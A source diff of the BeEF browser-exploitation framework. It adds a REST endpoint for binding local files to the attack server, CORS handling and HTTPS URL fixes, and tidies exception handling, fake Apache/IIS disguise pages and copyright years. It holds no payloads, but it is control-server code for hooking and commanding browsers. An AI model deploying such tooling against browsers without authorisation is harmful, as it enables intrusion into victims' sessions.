+++ b/core/main/rest/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,12 +37,19 @@ module BeEF
        end
      end
      module RegisterServerHandler
        def self.mount_handler(server)
          server.mount('/api/server', BeEF::Core::Rest::Server.new)
        end
      end
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterCategoriesHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterAdminHandler, BeEF::API::Server, 'mount_handler')
      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterServerHandler, BeEF::API::Server, 'mount_handler')
      #
      # Check the source IP is within the permitted subnet
--- a/core/main/rest/handlers/admin.rb
+++ b/core/main/rest/handlers/admin.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -52,7 +52,7 @@ module BeEF
                "token" => "#{config.get('beef.api_token')}"
              }.to_json
            end
-          rescue Exception => e
+          rescue => e
            error 400
          end
        end
--- a/core/main/rest/handlers/categories.rb
+++ b/core/main/rest/handlers/categories.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/rest/handlers/hookedbrowsers.rb
+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -149,7 +149,7 @@ module BeEF
            data.each{|k,v| options.push({'name' => k, 'value' => v})}
            exec_results = BeEF::Module.execute(modk, params[:session], options)
            exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
-          rescue Exception => e
+          rescue => e
            print_error "Invalid JSON input for module '#{params[:mod_id]}'"
            error 400 # Bad Request
          end
@@ -203,7 +203,7 @@ module BeEF
              end
            end
            results.to_json
-          rescue Exception => e
+          rescue => e
            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
            error 400 # Bad Request
          end
@@ -265,7 +265,7 @@ module BeEF
              }
            end
            results.to_json
-          rescue Exception => e
+          rescue => e
            print_error "Invalid JSON input passed to endpoint /api/modules/multi"
            error 400 # Bad Request
          end
--- a/core/main/rest/handlers/server.rb
+++ b/core/main/rest/handlers/server.rb
@@ -0,0 +1,41 @@
 #
 # Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 module BeEF
  module Core
    module Rest
      class Server < BeEF::Core::Router::Router
        config = BeEF::Core::Configuration.instance
        http_server = BeEF::Core::Server.instance
        before do
          error 401 unless params[:token] == config.get('beef.api_token')
          halt 401 if not BeEF::Core::Rest.permitted_source?(request.ip)
          headers 'Content-Type' => 'application/json; charset=UTF-8',
                  'Pragma' => 'no-cache',
                  'Cache-Control' => 'no-cache',
                  'Expires' => '0'
        end
        # @note Binds a local file to a specified path in BeEF's web server
        post '/bind' do
          request.body.rewind
          begin
            data = JSON.parse request.body.read
            mount = data['mount']
            local_file = data['local_file']
            BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(local_file, mount)
            status 200
          rescue => e
            error 400
          end
        end
      end
    end
  end
 end
--- a/core/main/router/api.rb
+++ b/core/main/router/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -81,21 +81,40 @@ module BeEF
            case type
              when "apache"
                headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
              when "iis"
                headers "Server" => "Microsoft-IIS/6.0",
                        "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
              else
                print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
            end
          end
          # @note If CORS are enabled, expose the appropriate headers
          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
          # and be able to handle requests with a JSON content-type
          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
            headers "Access-Control-Allow-Origin" => allowed_domains,
                    "Access-Control-Allow-Methods" => "POST, GET",
                    "Access-Control-Allow-Headers" => "Content-Type"
            halt 200
          end
          # @note If CORS are enabled, expose the appropriate headers
          if config.get("beef.http.restful_api.allow_cors")
            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
            headers "Access-Control-Allow-Origin" => allowed_domains,
                    "Access-Control-Allow-Methods" => "POST, GET"
          end
        end
        # @note Default root page
        get "/" do
          if config.get("beef.http.web_server_imitation.enable")
            bp = config.get "beef.http.web_ui_basepath"
            type = config.get("beef.http.web_server_imitation.type")
            case type
              when "apache"
@@ -191,7 +210,7 @@ module BeEF
                    "<h2>If you are the website administrator:</h2>" +
                    "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
                    "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
-                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
                    "</div>" +
                    "</div>" +
                    "</div>" +
@@ -216,7 +235,7 @@ module BeEF
                    "<table>" +
                    "<tr>" +
                    "<td ID=tableProps width=70 valign=top align=center>" +
-                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
                    "<td ID=tablePropsWidth width=400>" +
                    "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
                    "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,9 +22,10 @@ module BeEF
      def initialize
        @configuration = BeEF::Core::Configuration.instance
        beef_proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
        beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
        beef_port = @configuration.get("beef.http.public_port") || @configuration.get("beef.http.port")
-        @url = "http://#{beef_host}:#{beef_port}"
+        @url = "#{beef_proto}://#{beef_host}:#{beef_port}"
        @root_dir = File.expand_path('../../../', __FILE__)
        @command_urls = {}
        @mounts = {}
@@ -34,16 +35,18 @@ module BeEF
      def to_h
        {
-            'beef_version' => VERSION,
+            'beef_version'  => VERSION,
-            'beef_url' => @url,
+            'beef_url'      => @url,
            'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
+            'beef_host'     => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
+            'beef_port'     => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_public'   => @configuration.get('beef.http.public'),
            'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
            'client_debug'  => @configuration.get("beef.client_debug")
        }
      end
--- a/Show More
+++ b/Show More